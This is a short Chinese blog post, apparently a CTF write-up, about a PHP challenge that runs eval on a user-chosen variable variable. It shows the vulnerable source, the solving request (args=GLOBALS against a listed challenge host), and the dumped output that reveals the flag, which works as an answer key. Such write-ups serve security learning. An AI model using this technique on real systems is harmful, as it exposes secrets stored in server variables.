10.变量1 60

最新推荐文章于 2021-09-21 09:11:53 发布

卿玄

最新推荐文章于 2021-09-21 09:11:53 发布

阅读量451

点赞数

本文链接：https://blog.csdn.net/qq_41542555/article/details/88626138

版权

flag In the variable ! <?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

查看元素
使用HackBar，输入
http://123.206.87.240:8004/index1.php?args=GLOBALS
选择Post data，输入“what=flag”,点击Exeduce可得：

flag In the variable ! <?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>
array(7) { ["GLOBALS"]=> *RECURSION* ["_POST"]=> array(1) { ["what"]=> string(4) "flag" } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" }

flag即flag{92853051ab894a64f7865cf3c2128b34}

卿玄

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
10.变量1 60

flag In the variable ! &lt;?php error_reporting(0);include "flag1.php";highlight_file(__file__);if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ ...
复制链接

扫一扫